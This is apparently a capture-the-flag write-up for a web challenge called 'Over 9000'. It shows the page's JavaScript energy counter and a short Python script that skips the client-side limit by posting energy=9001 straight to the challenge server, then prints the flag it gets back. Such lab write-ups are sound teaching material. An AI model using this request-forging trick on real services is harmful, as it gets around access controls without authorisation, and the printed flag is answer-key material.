Over 9000

Help Goku get over 9000 energy to defeat his enemy Vegeta and save the world.

3.23.56.243:9005

Visit the site. Head to Chrome Dev Tools —> Sources. Here’s the .js file controlling it all:

1
let currentEnergy = 0;
2

3
function gatheringEnergy(){
4
    currentEnergy++;
5
    $("#energycount").html(`${currentEnergy}`);
6
    if(currentEnergy == 10)
7
    {
8
        alert("out of energy try again :(")
9
        currentEnergy = 0;
10
        $("#energycount").html(0);
11

12
    }
13
    else if (currentEnergy > 9000)
14
    {
15

16
        $.ajax({
17
            type:"POST",
18
            url:"kamehameha.php",
19
            data:{energy: currentEnergy},
20
            success: function(flag){
21
                alert(`${flag}`);
22
            },
23
            error: function(responseText,status, error){
24
                console.log(`Tell the infrastructure team to fix this: Status = ${status} ; Error = ${error}`);
25
            }
26

27

28
        })
29

30
    }
31
}

So it’s impossible to actually get to over 9000. However, we can just send a POST request ourselves to kamehameha.php! Here’s a script that does just that:

1
from requests import post
2

3
d = dict()
4
d["energy"] = 9001
5
res = post("http://3.23.56.243:9005/kamehameha.php", d).text
6
print(res)

And we get the flag!

1
texsaw{y0u_th0ught_th1s_w4s_4_fl4g_but_1t_w4s_m3_d10}